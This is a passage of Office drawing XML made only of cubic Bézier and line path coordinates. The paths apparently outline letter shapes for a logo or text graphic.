                        <a:pt x="241" y="129"/>
                        <a:pt x="241" y="129"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="237" y="129"/>
                        <a:pt x="235" y="129"/>
                        <a:pt x="232" y="129"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="229" y="129"/>
                        <a:pt x="226" y="129"/>
                        <a:pt x="222" y="129"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="222" y="127"/>
                        <a:pt x="222" y="127"/>
                        <a:pt x="222" y="127"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="226" y="127"/>
                        <a:pt x="228" y="127"/>
                        <a:pt x="228" y="123"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="228" y="92"/>
                        <a:pt x="228" y="92"/>
                        <a:pt x="228" y="92"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="228" y="87"/>
                        <a:pt x="226" y="87"/>
                        <a:pt x="222" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="222" y="85"/>
                        <a:pt x="222" y="85"/>
                        <a:pt x="222" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="226" y="85"/>
                        <a:pt x="229" y="86"/>
                        <a:pt x="232" y="86"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="86"/>
                        <a:pt x="237" y="85"/>
                        <a:pt x="241" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="253" y="85"/>
                        <a:pt x="256" y="92"/>
                        <a:pt x="256" y="96"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="256" y="102"/>
                        <a:pt x="252" y="106"/>
                        <a:pt x="247" y="107"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="253" y="115"/>
                        <a:pt x="256" y="120"/>
                        <a:pt x="259" y="123"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="261" y="125"/>
                        <a:pt x="263" y="127"/>
                        <a:pt x="266" y="127"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="266" y="129"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="305" y="291"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="300" y="290"/>
                        <a:pt x="294" y="290"/>
                        <a:pt x="289" y="290"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="283" y="290"/>
                        <a:pt x="277" y="290"/>
                        <a:pt x="271" y="291"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="271" y="289"/>
                        <a:pt x="271" y="289"/>
                        <a:pt x="271" y="289"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="275" y="289"/>
                        <a:pt x="277" y="288"/>
                        <a:pt x="277" y="285"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="277" y="253"/>
                        <a:pt x="277" y="253"/>
                        <a:pt x="277" y="253"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="277" y="249"/>
                        <a:pt x="275" y="249"/>
                        <a:pt x="271" y="249"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="271" y="247"/>
                        <a:pt x="271" y="247"/>
                        <a:pt x="271" y="247"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="274" y="247"/>
                        <a:pt x="277" y="247"/>
                        <a:pt x="280" y="247"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="283" y="247"/>
                        <a:pt x="286" y="247"/>
                        <a:pt x="290" y="247"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="290" y="249"/>
                        <a:pt x="290" y="249"/>
                        <a:pt x="290" y="249"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="286" y="249"/>
                        <a:pt x="284" y="249"/>
                        <a:pt x="284" y="253"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="284" y="282"/>
                        <a:pt x="284" y="282"/>
                        <a:pt x="284" y="282"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="284" y="287"/>
                        <a:pt x="285" y="289"/>
                        <a:pt x="294" y="289"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="302" y="289"/>
                        <a:pt x="304" y="287"/>
                        <a:pt x="306" y="281"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="308" y="281"/>
                        <a:pt x="308" y="281"/>
                        <a:pt x="308" y="281"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="305" y="291"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="349" y="186"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="349" y="191"/>
                        <a:pt x="348" y="198"/>
                        <a:pt x="345" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="341" y="211"/>
                        <a:pt x="333" y="220"/>
                        <a:pt x="318" y="220"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="305" y="220"/>
                        <a:pt x="296" y="212"/>
                        <a:pt x="296" y="198"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="296" y="187"/>
                        <a:pt x="307" y="173"/>
                        <a:pt x="319" y="173"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="321" y="173"/>
                        <a:pt x="323" y="173"/>
                        <a:pt x="324" y="174"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="326" y="172"/>
                        <a:pt x="334" y="166"/>
                        <a:pt x="334" y="162"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="334" y="161"/>
                        <a:pt x="333" y="159"/>
                        <a:pt x="333" y="158"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="333" y="156"/>
                        <a:pt x="335" y="155"/>
                        <a:pt x="337" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="339" y="155"/>
                        <a:pt x="340" y="156"/>
                        <a:pt x="340" y="159"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="340" y="162"/>
                        <a:pt x="334" y="168"/>
                        <a:pt x="332" y="170"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="314" y="187"/>
                        <a:pt x="314" y="187"/>
                        <a:pt x="314" y="187"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="311" y="191"/>
                        <a:pt x="311" y="191"/>
                        <a:pt x="311" y="191"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="306" y="195"/>
                        <a:pt x="306" y="195"/>
                        <a:pt x="306" y="195"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="305" y="198"/>
                        <a:pt x="303" y="200"/>
                        <a:pt x="303" y="202"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="303" y="205"/>
                        <a:pt x="305" y="207"/>
                        <a:pt x="306" y="209"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="309" y="212"/>
                        <a:pt x="315" y="214"/>
                        <a:pt x="319" y="214"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="329" y="214"/>
                        <a:pt x="336" y="209"/>
                        <a:pt x="341" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="345" y="198"/>
                        <a:pt x="347" y="191"/>
                        <a:pt x="347" y="184"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="347" y="182"/>
                        <a:pt x="342" y="180"/>
                        <a:pt x="340" y="180"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="337" y="180"/>
                        <a:pt x="334" y="183"/>
                        <a:pt x="334" y="186"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="334" y="192"/>
                        <a:pt x="339" y="188"/>
                        <a:pt x="339" y="193"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="339" y="195"/>
                        <a:pt x="337" y="196"/>
                        <a:pt x="335" y="196"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="333" y="196"/>
                        <a:pt x="329" y="194"/>
                        <a:pt x="329" y="189"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="329" y="182"/>
                        <a:pt x="338" y="176"/>
                        <a:pt x="345" y="176"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="354" y="176"/>
                        <a:pt x="356" y="186"/>
                        <a:pt x="362" y="186"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="363" y="186"/>
                        <a:pt x="365" y="185"/>
                        <a:pt x="365" y="183"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="365" y="181"/>
                        <a:pt x="362" y="180"/>
                        <a:pt x="362" y="178"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="362" y="176"/>
                        <a:pt x="363" y="175"/>
                        <a:pt x="365" y="175"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="367" y="175"/>
                        <a:pt x="369" y="178"/>
                        <a:pt x="369" y="180"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="369" y="185"/>
                        <a:pt x="362" y="190"/>
                        <a:pt x="357" y="190"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="354" y="190"/>
                        <a:pt x="351" y="188"/>
                        <a:pt x="349" y="186"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="370" y="249"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="366" y="249"/>
                        <a:pt x="364" y="249"/>
                        <a:pt x="364" y="253"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="364" y="284"/>
                        <a:pt x="364" y="284"/>
                        <a:pt x="364" y="284"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="364" y="289"/>
                        <a:pt x="366" y="289"/>
                        <a:pt x="370" y="289"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="370" y="291"/>
                        <a:pt x="370" y="291"/>
                        <a:pt x="370" y="291"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="367" y="291"/>
                        <a:pt x="364" y="290"/>
                        <a:pt x="361" y="290"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="358" y="290"/>
                        <a:pt x="355" y="290"/>
                        <a:pt x="351" y="291"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="351" y="289"/>
                        <a:pt x="351" y="289"/>
                        <a:pt x="351" y="289"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="355" y="289"/>
                        <a:pt x="357" y="289"/>
                        <a:pt x="357" y="284"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="357" y="253"/>
                        <a:pt x="357" y="253"/>
                        <a:pt x="357" y="253"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="357" y="249"/>
                        <a:pt x="355" y="249"/>
                        <a:pt x="351" y="249"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="351" y="247"/>
                        <a:pt x="351" y="247"/>
                        <a:pt x="351" y="247"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="355" y="247"/>
                        <a:pt x="358" y="247"/>
                        <a:pt x="360" y="247"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="364" y="247"/>
                        <a:pt x="367" y="247"/>
                        <a:pt x="370" y="247"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="370" y="249"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="407" y="119"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="408" y="119"/>
                        <a:pt x="408" y="119"/>
                        <a:pt x="408" y="119"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="409" y="123"/>
                        <a:pt x="413" y="128"/>
                        <a:pt x="418" y="128"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="424" y="128"/>
                        <a:pt x="427" y="124"/>
                        <a:pt x="427" y="119"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="427" y="108"/>
                        <a:pt x="408" y="111"/>
                        <a:pt x="408" y="97"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="408" y="89"/>
                        <a:pt x="414" y="84"/>
                        <a:pt x="422" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="425" y="84"/>
                        <a:pt x="427" y="85"/>
                        <a:pt x="430" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="431" y="93"/>
                        <a:pt x="431" y="93"/>
                        <a:pt x="431" y="93"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="430" y="93"/>
                        <a:pt x="430" y="93"/>
                        <a:pt x="430" y="93"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="429" y="89"/>
                        <a:pt x="426" y="86"/>
                        <a:pt x="421" y="86"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="416" y="86"/>
                        <a:pt x="413" y="90"/>
                        <a:pt x="413" y="94"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="413" y="106"/>
                        <a:pt x="433" y="103"/>
                        <a:pt x="433" y="117"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="433" y="125"/>
                        <a:pt x="426" y="130"/>
                        <a:pt x="418" y="130"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="415" y="130"/>
                        <a:pt x="411" y="129"/>
                        <a:pt x="408" y="128"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="407" y="119"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="459" y="249"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="457" y="249"/>
                        <a:pt x="456" y="250"/>
                        <a:pt x="455" y="251"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="455" y="252"/>
                        <a:pt x="450" y="263"/>
                        <a:pt x="450" y="263"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="438" y="291"/>
                        <a:pt x="438" y="291"/>
                        <a:pt x="438" y="291"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="436" y="291"/>
                        <a:pt x="436" y="291"/>
                        <a:pt x="436" y="291"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="425" y="266"/>
                        <a:pt x="425" y="266"/>
                        <a:pt x="425" y="266"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="423" y="262"/>
                        <a:pt x="421" y="258"/>
                        <a:pt x="420" y="254"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="418" y="250"/>
                        <a:pt x="417" y="249"/>
                        <a:pt x="413" y="249"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="413" y="247"/>
                        <a:pt x="413" y="247"/>
                        <a:pt x="413" y="247"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="416" y="247"/>
                        <a:pt x="419" y="247"/>
                        <a:pt x="422" y="247"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="425" y="247"/>
                        <a:pt x="428" y="247"/>
                        <a:pt x="430" y="247"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="430" y="249"/>
                        <a:pt x="430" y="249"/>
                        <a:pt x="430" y="249"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="429" y="249"/>
                        <a:pt x="428" y="249"/>
                        <a:pt x="427" y="249"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="427" y="249"/>
                        <a:pt x="426" y="250"/>
                        <a:pt x="426" y="250"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="426" y="252"/>
                        <a:pt x="429" y="260"/>
                        <a:pt x="430" y="262"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="439" y="283"/>
                        <a:pt x="439" y="283"/>
                        <a:pt x="439" y="283"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="444" y="271"/>
                        <a:pt x="444" y="271"/>
                        <a:pt x="444" y="271"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="445" y="267"/>
                        <a:pt x="447" y="263"/>
                        <a:pt x="448" y="259"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="449" y="257"/>
                        <a:pt x="450" y="254"/>
                        <a:pt x="450" y="252"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="450" y="249"/>
                        <a:pt x="448" y="249"/>
                        <a:pt x="445" y="249"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="445" y="247"/>
                        <a:pt x="445" y="247"/>
                        <a:pt x="445" y="247"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="448" y="247"/>
                        <a:pt x="451" y="247"/>
                        <a:pt x="453" y="247"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="455" y="247"/>
                        <a:pt x="457" y="247"/>
                        <a:pt x="459" y="247"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="459" y="249"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="489" y="88"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="483" y="88"/>
                        <a:pt x="483" y="90"/>
                        <a:pt x="482" y="94"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="480" y="94"/>
                        <a:pt x="480" y="94"/>
                        <a:pt x="480" y="94"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="481" y="84"/>
                        <a:pt x="481" y="84"/>
                        <a:pt x="481" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="482" y="84"/>
                        <a:pt x="482" y="84"/>
                        <a:pt x="482" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="483" y="85"/>
                        <a:pt x="485" y="85"/>
                        <a:pt x="486" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="516" y="85"/>
                        <a:pt x="516" y="85"/>
                        <a:pt x="516" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="518" y="85"/>
                        <a:pt x="520" y="85"/>
                        <a:pt x="520" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="522" y="84"/>
                        <a:pt x="522" y="84"/>
                        <a:pt x="522" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="521" y="94"/>
                        <a:pt x="521" y="94"/>
                        <a:pt x="521" y="94"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="519" y="94"/>
                        <a:pt x="519" y="94"/>
                        <a:pt x="519" y="94"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="519" y="90"/>
                        <a:pt x="519" y="88"/>
                        <a:pt x="514" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="504" y="88"/>
                        <a:pt x="504" y="88"/>
                        <a:pt x="504" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="504" y="123"/>
                        <a:pt x="504" y="123"/>
                        <a:pt x="504" y="123"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="504" y="127"/>
                        <a:pt x="506" y="127"/>
                        <a:pt x="510" y="127"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="510" y="129"/>
                        <a:pt x="510" y="129"/>
                        <a:pt x="510" y="129"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="507" y="129"/>
                        <a:pt x="504" y="129"/>
                        <a:pt x="501" y="129"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="498" y="129"/>
                        <a:pt x="495" y="129"/>
                        <a:pt x="492" y="129"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="492" y="127"/>
                        <a:pt x="492" y="127"/>
                        <a:pt x="492" y="127"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="495" y="127"/>
                        <a:pt x="498" y="127"/>
                        <a:pt x="498" y="123"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="498" y="88"/>
                        <a:pt x="498" y="88"/>
                        <a:pt x="498" y="88"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="489" y="88"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="540" y="291"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="537" y="291"/>
                        <a:pt x="535" y="290"/>
                        <a:pt x="532" y="290"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="529" y="290"/>
                        <a:pt x="526" y="290"/>
                        <a:pt x="523" y="291"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="523" y="289"/>
                        <a:pt x="523" y="289"/>
                        <a:pt x="523" y="289"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="524" y="289"/>
                        <a:pt x="524" y="289"/>
                        <a:pt x="524" y="289"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="525" y="289"/>
                        <a:pt x="527" y="289"/>
                        <a:pt x="527" y="287"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="527" y="286"/>
                        <a:pt x="527" y="284"/>
                        <a:pt x="526" y="283"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="523" y="274"/>
                        <a:pt x="523" y="274"/>
                        <a:pt x="523" y="274"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="508" y="274"/>
                        <a:pt x="508" y="274"/>
                        <a:pt x="508" y="274"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="506" y="279"/>
                        <a:pt x="506" y="279"/>
                        <a:pt x="506" y="279"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="505" y="281"/>
                        <a:pt x="505" y="284"/>
                        <a:pt x="505" y="286"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="505" y="289"/>
                        <a:pt x="507" y="289"/>
                        <a:pt x="509" y="289"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="511" y="289"/>
                        <a:pt x="511" y="289"/>
                        <a:pt x="511" y="289"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="511" y="291"/>
                        <a:pt x="511" y="291"/>
                        <a:pt x="511" y="291"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="508" y="291"/>
                        <a:pt x="505" y="290"/>
                        <a:pt x="503" y="290"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="500" y="290"/>
                        <a:pt x="497" y="290"/>
                        <a:pt x="495" y="291"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="495" y="289"/>
                        <a:pt x="495" y="289"/>
                        <a:pt x="495" y="289"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="499" y="288"/>
                        <a:pt x="500" y="288"/>
                        <a:pt x="501" y="284"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="502" y="282"/>
                        <a:pt x="503" y="280"/>
                        <a:pt x="504" y="278"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="512" y="255"/>
                        <a:pt x="512" y="255"/>
                        <a:pt x="512" y="255"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="513" y="254"/>
                        <a:pt x="514" y="252"/>
                        <a:pt x="514" y="250"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="514" y="249"/>
                        <a:pt x="514" y="249"/>
                        <a:pt x="514" y="248"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="515" y="248"/>
                        <a:pt x="516" y="247"/>
                        <a:pt x="517" y="245"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="518" y="245"/>
                        <a:pt x="518" y="245"/>
                        <a:pt x="518" y="245"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="531" y="278"/>
                        <a:pt x="531" y="278"/>
                        <a:pt x="531" y="278"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="532" y="281"/>
                        <a:pt x="534" y="286"/>
                        <a:pt x="535" y="287"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="536" y="288"/>
                        <a:pt x="538" y="289"/>
                        <a:pt x="540" y="289"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="540" y="291"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="635" y="249"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="631" y="249"/>
                        <a:pt x="629" y="249"/>
                        <a:pt x="629" y="255"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="629" y="291"/>
                        <a:pt x="629" y="291"/>
                        <a:pt x="629" y="291"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="628" y="291"/>
                        <a:pt x="628" y="291"/>
                        <a:pt x="628" y="291"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="593" y="255"/>
                        <a:pt x="593" y="255"/>
                        <a:pt x="593" y="255"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="593" y="279"/>
                        <a:pt x="593" y="279"/>
                        <a:pt x="593" y="279"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="593" y="287"/>
                        <a:pt x="594" y="289"/>
                        <a:pt x="601" y="289"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="601" y="291"/>
                        <a:pt x="601" y="291"/>
                        <a:pt x="601" y="291"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="598" y="291"/>
                        <a:pt x="595" y="290"/>
                        <a:pt x="592" y="290"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="590" y="290"/>
                        <a:pt x="587" y="290"/>
                        <a:pt x="584" y="291"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="584" y="289"/>
                        <a:pt x="584" y="289"/>
                        <a:pt x="584" y="289"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="588" y="289"/>
                        <a:pt x="591" y="289"/>
                        <a:pt x="591" y="281"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="591" y="256"/>
                        <a:pt x="591" y="256"/>
                        <a:pt x="591" y="256"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="591" y="251"/>
                        <a:pt x="588" y="249"/>
                        <a:pt x="583" y="249"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="583" y="247"/>
                        <a:pt x="583" y="247"/>
                        <a:pt x="583" y="247"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="585" y="247"/>
                        <a:pt x="587" y="247"/>
                        <a:pt x="589" y="247"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="591" y="247"/>
                        <a:pt x="592" y="247"/>
                        <a:pt x="594" y="247"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="597" y="251"/>
                        <a:pt x="603" y="257"/>
                        <a:pt x="610" y="264"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="616" y="270"/>
                        <a:pt x="622" y="276"/>
                        <a:pt x="626" y="281"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="626" y="256"/>
                        <a:pt x="626" y="256"/>
                        <a:pt x="626" y="256"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="626" y="251"/>
                        <a:pt x="625" y="249"/>
                        <a:pt x="619" y="249"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="619" y="247"/>
                        <a:pt x="619" y="247"/>
                        <a:pt x="619" y="247"/>
                      </a:cubicBezTo>
